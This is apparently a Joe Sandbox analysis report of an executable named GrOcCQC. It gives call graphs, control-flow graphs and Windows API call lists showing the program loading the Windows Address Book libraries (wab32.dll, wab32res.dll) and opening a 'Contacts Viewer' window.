                                  execution_graph 871 7e31bf _XcptFilter 882 7e37c2 883 7e37d3 882->883 886 7e2f51 ResolveDelayLoadedAPI 883->886 885 7e37e0 886->885 872 7e31d3 873 7e31ee 872->873 874 7e31e7 _exit 872->874 875 7e31f7 _cexit 873->875 876 7e3202 873->876 874->873 875->876 647 7e3030 664 7e3675 647->664 649 7e3035 650 7e3046 GetStartupInfoW 649->650 651 7e3063 650->651 652 7e3078 651->652 653 7e307f Sleep 651->653 654 7e3097 _amsg_exit 652->654 656 7e30a1 652->656 653->651 654->656 655 7e30e3 _initterm 662 7e30fe 655->662 656->655 657 7e30c4 656->657 656->662 658 7e31a6 _ismbblead 658->662 659 7e31ee 659->657 660 7e31f7 _cexit 659->660 660->657 662->658 662->659 663 7e318e exit 662->663 669 7e1c5c 662->669 663->662 665 7e369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 664->665 666 7e369a 664->666 668 7e36ed 665->668 666->665 667 7e3702 666->667 667->649 668->667 732 7e37f0 669->732 673 7e1d01 HeapSetInformation 674 7e1d20 673->674 707 7e1d18 673->707 736 7e29ab CommandLineToArgvW 674->736 679 7e201a FreeLibrary 680 7e2560 679->680 683 7e256b FreeLibrary 680->683 684 7e2578 680->684 681 7e1e0e 750 7e1b83 memset 681->750 683->684 786 7e1ae4 684->786 687 7e1e2f 756 7e25d3 memset memset CommandLineToArgvW 687->756 688 7e1e22 GetLastError 688->707 691 7e1ae4 2 API calls 693 7e259a 691->693 790 7e32b0 693->790 696 7e25a9 696->662 697 7e1eee 698 7e1ef2 EventUnregister 697->698 700 7e1f1f memset LoadStringW MessageBoxW 698->700 701 7e1f6d 698->701 700->707 702 7e1f79 GetProcAddress 701->702 706 7e202e 701->706 702->707 704 7e2036 GetProcAddress 704->707 710 7e204e 704->710 706->704 708 7e208a 706->708 707->679 707->680 708->707 709 7e211c GetProcAddress 708->709 709->707 711 7e2136 709->711 710->707 712 7e218c memset 711->712 713 7e2225 711->713 714 7e21a9 LoadStringW 712->714 716 7e2384 713->716 796 7e1b21 713->796 714->713 718 7e238d GetProcAddress 716->718 719 7e242a 716->719 718->707 726 7e23a5 718->726 720 7e2433 GetProcAddress 719->720 721 7e24d0 719->721 720->707 727 7e244b 720->727 722 7e24d8 GetProcAddress 721->722 723 7e24f0 721->723 722->707 722->723 723->707 724 7e2525 GetProcAddress 723->724 724->707 725 7e253d 724->725 725->680 726->707 728 7e23e2 memset LoadStringW 726->728 727->707 729 7e2488 memset LoadStringW 727->729 728->719 729->721 731 7e233c memset LoadStringW 731->716 733 7e1c6b memset GetCommandLineW 732->733 734 7e1ab0 733->734 735 7e1acb 734->735 735->673 735->735 737 7e29cc 736->737 738 7e1d27 736->738 739 7e29db LocalFree 737->739 742 7e1bf4 738->742 739->738 741 7e29ec 739->741 740 7e2a08 RegisterApplicationRestart 740->738 741->740 800 7e28a4 memset 742->800 745 7e1c4d 748 7e32b0 4 API calls 745->748 746 7e1c28 PathAppendW 746->745 747 7e1c3e LoadLibraryW 746->747 747->745 749 7e1c5a 6 API calls 748->749 749->681 749->707 751 7e28a4 9 API calls 750->751 752 7e1bbb LoadLibraryW 751->752 754 7e32b0 4 API calls 752->754 755 7e1bf2 754->755 755->687 755->688 757 7e2888 756->757 758 7e2661 756->758 760 7e32b0 4 API calls 757->760 759 7e287d LocalFree 758->759 762 7e2683 StrCmpNIW 758->762 767 7e2676 758->767 759->757 761 7e1e43 760->761 761->707 781 7e193a EventRegister 761->781 763 7e26f0 762->763 766 7e26a0 762->766 764 7e2741 763->764 768 7e2709 PathFindExtensionW 763->768 765 7e2761 StrCmpIW 764->765 764->767 765->764 773 7e2785 765->773 766->767 810 7e1b57 766->810 767->759 769 7e271e StrCmpIW 768->769 769->764 772 7e2730 769->772 771 7e27c0 774 7e27d3 GetFileAttributesW 771->774 772->767 772->769 773->767 773->771 775 7e27e5 774->775 778 7e2833 774->778 776 7e27ee PathRemoveFileSpecW 775->776 780 7e2811 775->780 777 7e27ff GetFileAttributesW 776->777 776->780 777->778 777->780 778->780 814 7e2b60 778->814 780->767 782 7e1998 EventSetInformation 781->782 783 7e198b 781->783 782->783 784 7e32b0 4 API calls 783->784 785 7e19c5 784->785 785->697 785->698 795 7e19c7 EventWriteTransfer 785->795 787 7e1af2 786->787 788 7e1b16 787->788 789 7e1b06 GetProcessHeap HeapFree 787->789 788->691 789->788 791 7e32bb 790->791 792 7e32b8 790->792 828 7e32c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 791->828 792->696 794 7e33f6 794->696 795->697 797 7e1b2e 796->797 799 7e1b4d 796->799 829 7e2c36 797->829 799->707 799->731 801 7e28ee RegOpenKeyExW 800->801 802 7e2989 800->802 801->802 803 7e2914 RegQueryValueExW 801->803 804 7e32b0 4 API calls 802->804 803->802 806 7e2949 803->806 805 7e1c17 PathRemoveFileSpecW 804->805 805->745 805->746 807 7e296d GetFileAttributesW 806->807 808 7e2958 ExpandEnvironmentStringsW 806->808 807->802 809 7e2979 807->809 808->802 809->802 811 7e1b63 810->811 811->811 812 7e2b60 6 API calls 811->812 813 7e1b7b 812->813 813->767 815 7e2bc7 814->815 816 7e2b74 814->816 815->780 816->815 820 7e2a7e 816->820 819 7e2baa memcpy 819->815 821 7e2a95 820->821 822 7e2a8e 820->822 821->822 823 7e2ac9 GetProcessHeap HeapAlloc 821->823 822->815 822->819 823->822 824 7e2adf 823->824 825 7e2ae5 memcpy 824->825 827 7e2aff 824->827 825->827 826 7e2b33 GetProcessHeap HeapFree 826->822 827->822 827->826 827->827 828->794 830 7e2ce8 829->830 831 7e2c61 829->831 832 7e32b0 4 API calls 830->832 834 7e2a7e 5 API calls 831->834 833 7e2cf7 832->833 833->799 835 7e2c86 834->835 840 7e2cd4 835->840 841 7e2cfb 835->841 836 7e1ae4 2 API calls 836->830 840->836 842 7e2cae 841->842 843 7e2d0a 841->843 842->840 849 7e2bd5 842->849 843->842 855 7e2ef8 843->855 845 7e2d44 memset 845->842 848 7e2d4b memset 848->842 850 7e2c28 849->850 851 7e2be5 849->851 850->840 851->850 852 7e2a7e 5 API calls 851->852 853 7e2c0b 852->853 853->850 854 7e2c11 memcpy 853->854 854->850 856 7e2f07 855->856 858 7e2d2b 856->858 859 7e2e3f 856->859 858->845 858->848 861 7e2e83 859->861 860 7e2e8f 860->858 861->860 862 7e2e9f LocalAlloc 861->862 862->860 863 7e2eaf 862->863 864 7e2ee8 LocalFree 863->864 867 7e2deb 863->867 864->860 866 7e2eda 866->864 868 7e2df8 867->868 870 7e2e1c 867->870 869 7e2e06 IsDBCSLeadByte 868->869 868->870 869->868 869->870 870->866 877 7e3450 SetUnhandledExceptionFilter 878 7e25b0 879 7e25be 878->879 880 7e25c5 PostQuitMessage 878->880 879->880 881 7e3790 _except_handler4_common 887 7e3400 888 7e343d 887->888 890 7e3412 887->890 889 7e3437 ?terminate@ 889->888 890->888 890->889 891 7e2f80 892 7e2f85 891->892 900 7e34d8 GetModuleHandleW 892->900 894 7e2f91 __set_app_type __p__fmode __p__commode 895 7e2fc9 894->895 896 7e2fde 895->896 897 7e2fd2 __setusermatherr 895->897 902 7e370d _controlfp 896->902 897->896 899 7e2fe3 901 7e34e9 900->901 901->894 902->899 903 7e3001 904 7e3005 __getmainargs 903->904

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_007E2A7E 1 Function_007E2D7F 2 Function_007E2CFB 4 Function_007E2EF8 2->4 3 Function_007E13F8 27 Function_007E2E3F 4->27 5 Function_007E1BF4 34 Function_007E32B0 5->34 41 Function_007E28A4 5->41 6 Function_007E3675 7 Function_007E37F0 8 Function_007E376D 9 Function_007E2DEB 10 Function_007E1AE4 11 Function_007E3464 40 Function_007E3728 11->40 12 Function_007E1A60 13 Function_007E2B60 13->0 14 Function_007E1C5C 14->5 14->7 14->10 18 Function_007E25D3 14->18 23 Function_007E19C7 14->23 29 Function_007E193A 14->29 33 Function_007E1AB0 14->33 14->34 39 Function_007E29AB 14->39 44 Function_007E1B21 14->44 50 Function_007E1B83 14->50 15 Function_007E34D8 15->11 16 Function_007E1B57 16->13 17 Function_007E2BD5 17->0 18->12 18->13 18->16 18->34 19 Function_007E31D3 20 Function_007E3450 21 Function_007E2F51 22 Function_007E324A 24 Function_007E37C2 24->21 25 Function_007E3640 26 Function_007E32C0 27->1 27->9 28 Function_007E31BF 29->34 30 Function_007E2C36 30->0 30->2 30->10 30->17 30->33 30->34 31 Function_007E34B5 32 Function_007E3030 32->6 32->14 32->40 46 Function_007E3219 32->46 51 Function_007E3580 32->51 34->26 35 Function_007E3530 36 Function_007E18B0 37 Function_007E25B0 38 Function_007E34B1 43 Function_007E2A21 39->43 41->12 41->34 42 Function_007E3520 44->30 45 Function_007E361E 47 Function_007E3790 48 Function_007E370D 49 Function_007E360B 50->34 50->41 51->25 51->35 52 Function_007E3400 53 Function_007E1B80 54 Function_007E2F80 54->15 54->22 54->42 54->48 55 Function_007E3001

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 7e1c5c-7e1d16 call 7e37f0 memset GetCommandLineW call 7e1ab0 HeapSetInformation 5 7e1d18-7e1d1b 0->5 6 7e1d20-7e1e08 call 7e29ab call 7e1bf4 LoadStringW LoadIconW LoadCursorW GetStockObject RegisterClassW CreateWindowExW 0->6 7 7e1faf 5->7 6->7 19 7e1e0e-7e1e20 call 7e1b83 6->19 10 7e1fb1-7e1fb9 7->10 12 7e1fde-7e1fe6 10->12 13 7e1fbb-7e1fd5 10->13 15 7e200d-7e2014 12->15 16 7e1fe8-7e2004 12->16 13->12 32 7e1fd7-7e1fdc 13->32 17 7e201a-7e2029 FreeLibrary 15->17 18 7e2560 15->18 16->15 33 7e2006-7e200b 16->33 22 7e2562-7e2569 17->22 18->22 30 7e1e2f-7e1e45 call 7e25d3 19->30 31 7e1e22 GetLastError 19->31 24 7e256b-7e2572 FreeLibrary 22->24 25 7e2578-7e25aa call 7e1ae4 * 2 call 7e32b0 22->25 24->25 30->7 40 7e1e4b-7e1e62 call 7e193a 30->40 35 7e1e28-7e1e2a 31->35 32->12 33->15 35->7 45 7e1e68-7e1e76 40->45 46 7e1ef0 40->46 47 7e1e78-7e1e88 45->47 48 7e1ef2-7e1f1d EventUnregister 45->48 46->48 47->48 49 7e1e8a-7e1e8c 47->49 50 7e1f1f-7e1f62 memset LoadStringW MessageBoxW 48->50 51 7e1f6d-7e1f73 48->51 49->48 52 7e1e8e-7e1eee call 7e19c7 49->52 53 7e1f68-7e1f6b 50->53 54 7e202e-7e2034 51->54 55 7e1f79-7e1f8b GetProcAddress 51->55 52->48 53->10 57 7e206a-7e2070 54->57 58 7e2036 54->58 59 7e1fac-7e1fae 55->59 60 7e1f8d-7e1f95 55->60 61 7e2076-7e207c 57->61 62 7e2072-7e2074 57->62 64 7e2038-7e2048 GetProcAddress 58->64 59->7 71 7e1f99-7e1f9b 60->71 66 7e207e-7e2080 61->66 67 7e2082-7e2084 61->67 62->64 64->59 68 7e204e-7e205c 64->68 66->64 69 7e208a-7e2098 67->69 70 7e2086-7e2088 67->70 91 7e205e-7e2063 68->91 92 7e2065 68->92 72 7e209a-7e20a1 69->72 73 7e20b3-7e20b9 69->73 70->64 75 7e1f9d-7e1fa2 71->75 76 7e1fa4-7e1fa6 71->76 77 7e20ab-7e20b1 72->77 78 7e20a3-7e20a9 72->78 79 7e20bb-7e20c2 73->79 80 7e20d4-7e20da 73->80 75->76 76->35 76->59 83 7e210f-7e2116 77->83 78->83 84 7e20cc-7e20d2 79->84 85 7e20c4-7e20ca 79->85 81 7e20dc-7e20e3 80->81 82 7e20f5-7e20fd 80->82 87 7e20ed-7e20f3 81->87 88 7e20e5-7e20eb 81->88 82->83 89 7e20ff-7e2109 82->89 83->53 90 7e211c-7e2130 GetProcAddress 83->90 84->83 85->83 87->83 88->83 89->83 90->53 93 7e2136-7e2179 90->93 91->92 92->59 96 7e217b-7e2180 93->96 97 7e2182-7e2186 93->97 96->97 98 7e218c-7e21a7 memset 97->98 99 7e2225-7e2228 97->99 102 7e21ec 98->102 103 7e21a9-7e21af 98->103 100 7e222a-7e2247 99->100 101 7e2251-7e2254 99->101 122 7e224a 100->122 106 7e2256-7e227f 101->106 107 7e2281-7e2284 101->107 108 7e21f1-7e221a LoadStringW 102->108 104 7e21e5-7e21ea 103->104 105 7e21b1-7e21b7 103->105 104->108 109 7e21de-7e21e3 105->109 110 7e21b9-7e21bf 105->110 106->122 111 7e2286-7e2291 107->111 112 7e22c7-7e22ca 107->112 108->99 109->108 114 7e21d7-7e21dc 110->114 115 7e21c1-7e21d5 110->115 117 7e2299-7e22c5 111->117 118 7e2293 111->118 119 7e2384-7e2387 112->119 120 7e22d0-7e22e4 call 7e1b21 112->120 114->108 115->108 117->122 118->117 123 7e238d-7e239f GetProcAddress 119->123 124 7e242a-7e242d 119->124 120->53 131 7e22ea-7e22f5 120->131 122->101 123->59 125 7e23a5-7e23c6 123->125 129 7e2433-7e2445 GetProcAddress 124->129 130 7e24d0-7e24d6 124->130 148 7e23cf-7e23d1 125->148 149 7e23c8-7e23cd 125->149 129->59 134 7e244b-7e246c 129->134 132 7e24d8-7e24ea GetProcAddress 130->132 133 7e2519-7e251f 130->133 136 7e22fd-7e2320 131->136 137 7e22f7 131->137 132->59 138 7e24f0-7e2514 132->138 133->53 140 7e2525-7e2537 GetProcAddress 133->140 150 7e246e-7e2473 134->150 151 7e2475-7e2477 134->151 158 7e2329-7e232b 136->158 159 7e2322-7e2327 136->159 137->136 138->133 140->59 141 7e253d-7e255b 140->141 141->18 148->59 152 7e23d7-7e23dc 148->152 149->148 150->151 151->59 155 7e247d-7e2482 151->155 152->59 157 7e23e2-7e241f memset LoadStringW 152->157 155->59 160 7e2488-7e24c5 memset LoadStringW 155->160 157->124 158->59 161 7e2331-7e2336 158->161 159->158 160->130 161->59 162 7e233c-7e2379 memset LoadStringW 161->162 162->119
                                  APIs
                                  • memset.MSVCRT ref: 007E1CC6
                                  • GetCommandLineW.KERNEL32 ref: 007E1CCE
                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 007E1D0E
                                  • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 007E1D49
                                  • LoadIconW.USER32 ref: 007E1D84
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 007E1D96
                                  • GetStockObject.GDI32(00000000), ref: 007E1DA3
                                  • RegisterClassW.USER32(00000003), ref: 007E1DCD
                                  • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 007E1DF8
                                  • GetLastError.KERNEL32 ref: 007E1E22
                                  • FreeLibrary.KERNELBASE(?), ref: 007E201B
                                  • FreeLibrary.KERNELBASE(?), ref: 007E256C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                  • String ID: $API Entered$Contacts Viewer$WABOpen
                                  • API String ID: 328653217-1327836325
                                  • Opcode ID: 5d8062eb49536ac5df790142f647ca82a958e5c9d37d05235a36973c435f64dc
                                  • Instruction ID: ce5206d1fa4c1b56f0406f665a89abf45132d487696230efe9a0b03a44b6c7ac
                                  • Opcode Fuzzy Hash: 5d8062eb49536ac5df790142f647ca82a958e5c9d37d05235a36973c435f64dc
                                  • Instruction Fuzzy Hash: 3032C9719022989FDB248B16DC85BE977B9FF4C304F5440A9F509AB1A1DB3C9E81CF94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 163 7e28a4-7e28e8 memset 164 7e28ee-7e2912 RegOpenKeyExW 163->164 165 7e299d-7e29aa call 7e32b0 163->165 166 7e2989-7e298f 164->166 167 7e2914-7e2947 RegQueryValueExW 164->167 166->165 171 7e2991 166->171 167->166 170 7e2949-7e2956 167->170 172 7e296d-7e2977 GetFileAttributesW 170->172 173 7e2958-7e296b ExpandEnvironmentStringsW 170->173 171->165 172->166 174 7e2979-7e2984 call 7e1a60 172->174 173->166 174->166
                                  APIs
                                  • memset.MSVCRT ref: 007E28DE
                                  • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 007E290A
                                  • RegQueryValueExW.KERNELBASE(?,007E11FC,00000000,?,?,?,?,00000000,00000000), ref: 007E293F
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 007E295F
                                  • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 007E296E
                                  • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 007E2997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                  • String ID: 0Gw$Software\Microsoft\WAB\DLLPath
                                  • API String ID: 2763597636-47952444
                                  • Opcode ID: a588e18f0baa1d12470e578b3f7ea60ca76c97d6459d7f76679e2f5446ad5b49
                                  • Instruction ID: 4b20ff2cd6123981b81ee2e2b41a43afceb806dc98e44f7478e76f805f43daeb
                                  • Opcode Fuzzy Hash: a588e18f0baa1d12470e578b3f7ea60ca76c97d6459d7f76679e2f5446ad5b49
                                  • Instruction Fuzzy Hash: 9621A3B094225CAACB309B268C8DEDAB7BCAF58710F1002D9B419F6152DB745B85CEA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 176 7e3030-7e3061 call 7e3675 call 7e3728 GetStartupInfoW 182 7e3063-7e3072 176->182 183 7e308c-7e308e 182->183 184 7e3074-7e3076 182->184 187 7e308f-7e3095 183->187 185 7e307f-7e308a Sleep 184->185 186 7e3078-7e307d 184->186 185->182 186->187 188 7e3097-7e309f _amsg_exit 187->188 189 7e30a1-7e30a7 187->189 190 7e30db-7e30e1 188->190 191 7e30a9-7e30c2 call 7e3219 189->191 192 7e30d5 189->192 193 7e30fe-7e3100 190->193 194 7e30e3-7e30f4 _initterm 190->194 191->190 201 7e30c4-7e30d0 191->201 192->190 196 7e310b-7e3112 193->196 197 7e3102-7e3109 193->197 194->193 199 7e3137-7e3141 196->199 200 7e3114-7e3121 call 7e3580 196->200 197->196 203 7e3144-7e3149 199->203 200->199 208 7e3123-7e3135 200->208 204 7e3209-7e3218 201->204 206 7e314b-7e314d 203->206 207 7e3195-7e3198 203->207 211 7e314f-7e3151 206->211 212 7e3164-7e3168 206->212 209 7e319a-7e31a3 207->209 210 7e31a6-7e31b3 _ismbblead 207->210 208->199 209->210 215 7e31b9-7e31bd 210->215 216 7e31b5-7e31b6 210->216 211->207 217 7e3153-7e3155 211->217 213 7e316a-7e316e 212->213 214 7e3170-7e3172 212->214 219 7e3173-7e318c call 7e1c5c 213->219 214->219 215->203 221 7e31ee-7e31f5 215->221 216->215 217->212 218 7e3157-7e315a 217->218 218->212 222 7e315c-7e3162 218->222 219->221 227 7e318e-7e318f exit 219->227 223 7e31f7-7e31fd _cexit 221->223 224 7e3202 221->224 222->217 223->224 224->204 227->207
                                  APIs
                                    • Part of subcall function 007E3675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007E36A2
                                    • Part of subcall function 007E3675: GetCurrentProcessId.KERNEL32 ref: 007E36B1
                                    • Part of subcall function 007E3675: GetCurrentThreadId.KERNEL32 ref: 007E36BA
                                    • Part of subcall function 007E3675: GetTickCount.KERNEL32 ref: 007E36C3
                                    • Part of subcall function 007E3675: QueryPerformanceCounter.KERNEL32(?), ref: 007E36D8
                                  • GetStartupInfoW.KERNEL32(?,007E3838,00000058), ref: 007E304F
                                  • Sleep.KERNEL32(000003E8), ref: 007E3084
                                  • _amsg_exit.MSVCRT ref: 007E3099
                                  • _initterm.MSVCRT ref: 007E30ED
                                  • exit.KERNELBASE ref: 007E318F
                                  • _ismbblead.MSVCRT ref: 007E31AA
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFileInfoPerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                  • String ID:
                                  • API String ID: 626344529-0
                                  • Opcode ID: f39361696d671d7825ceb9d7c6c0881dfe444a272d67927c166cab42757b279c
                                  • Instruction ID: e5b06d55eaec1a9a9a49d398a337ae48ab3561c67afe5e01cb624f5c2d0ebac9
                                  • Opcode Fuzzy Hash: f39361696d671d7825ceb9d7c6c0881dfe444a272d67927c166cab42757b279c
                                  • Instruction Fuzzy Hash: 0441F4719077D8DBDB209B6BD88D36A77E5EB4C720F20402EE501AB290CB7C8E408B94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 228 7e1bf4-7e1c26 call 7e28a4 PathRemoveFileSpecW 231 7e1c4d-7e1c5b call 7e32b0 228->231 232 7e1c28-7e1c3c PathAppendW 228->232 232->231 233 7e1c3e-7e1c4b LoadLibraryW 232->233 233->231
                                  APIs
                                    • Part of subcall function 007E28A4: memset.MSVCRT ref: 007E28DE
                                    • Part of subcall function 007E28A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 007E290A
                                    • Part of subcall function 007E28A4: RegQueryValueExW.KERNELBASE(?,007E11FC,00000000,?,?,?,?,00000000,00000000), ref: 007E293F
                                    • Part of subcall function 007E28A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 007E295F
                                    • Part of subcall function 007E28A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 007E2997
                                  • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 007E1C1E
                                  • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 007E1C34
                                  • LoadLibraryW.KERNELBASE(?), ref: 007E1C45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                  • String ID: wab32res.dll
                                  • API String ID: 1705514897-2698570859
                                  • Opcode ID: 4d52697c795fe5ac0e17b662513a108784352373693f04edfdc846253aa2f179
                                  • Instruction ID: db4f33e6e1cec2bccba3803c89c7f15204b685b7f9c853cb5bd0e7bdd4f0aa14
                                  • Opcode Fuzzy Hash: 4d52697c795fe5ac0e17b662513a108784352373693f04edfdc846253aa2f179
                                  • Instruction Fuzzy Hash: CAF030B5A0329C9BCB20EBB69D4DA9E77BCAB4C704F9081A5A511D7141DB38DE04CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 236 7e1b83-7e1bc1 memset call 7e28a4 239 7e1bc4-7e1bcd 236->239 239->239 240 7e1bcf-7e1bda 239->240 241 7e1bdc 240->241 242 7e1be1-7e1bf3 LoadLibraryW call 7e32b0 240->242 241->242
                                  APIs
                                  • memset.MSVCRT ref: 007E1BA8
                                    • Part of subcall function 007E28A4: memset.MSVCRT ref: 007E28DE
                                    • Part of subcall function 007E28A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 007E290A
                                    • Part of subcall function 007E28A4: RegQueryValueExW.KERNELBASE(?,007E11FC,00000000,?,?,?,?,00000000,00000000), ref: 007E293F
                                    • Part of subcall function 007E28A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 007E295F
                                    • Part of subcall function 007E28A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 007E2997
                                  • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 007E1BE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                  • String ID: wab32.dll
                                  • API String ID: 2792020168-2849205143
                                  • Opcode ID: 2e2f464eb18df41bef774c85ec95391a2271f70e5ca501148bface9299121526
                                  • Instruction ID: ff3c5ffc60c797957a94ff13b39d5ce0e345b38c4ffe7757c8076a983ff42123
                                  • Opcode Fuzzy Hash: 2e2f464eb18df41bef774c85ec95391a2271f70e5ca501148bface9299121526
                                  • Instruction Fuzzy Hash: 64F0817040325C97CF24EB69DC4E9EA7778DF0C300F904194E8068B141EA345F05CA80

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 245 7e29ab-7e29ca CommandLineToArgvW 246 7e29cc-7e29ea call 7e2a21 LocalFree 245->246 247 7e2a15 245->247 248 7e2a1a-7e2a20 246->248 251 7e29ec-7e2a03 call 7e2a21 246->251 247->248 254 7e2a08-7e2a13 RegisterApplicationRestart 251->254 255 7e2a05 251->255 254->248 255->254
                                  APIs
                                  • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 007E29C0
                                  • LocalFree.KERNEL32(00000000,?), ref: 007E29DE
                                  • RegisterApplicationRestart.KERNELBASE(007E1428,00000000,00000000), ref: 007E2A0B
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                  • String ID:
                                  • API String ID: 3182635576-0
                                  • Opcode ID: 3e31ab07d4fca23d84042359818a0715f58b449b3d67affa7bb89c441d4e267b
                                  • Instruction ID: 2755394955d986fbffc5851108cb54f4965615099bb052f73efc5e81d8c5cbc5
                                  • Opcode Fuzzy Hash: 3e31ab07d4fca23d84042359818a0715f58b449b3d67affa7bb89c441d4e267b
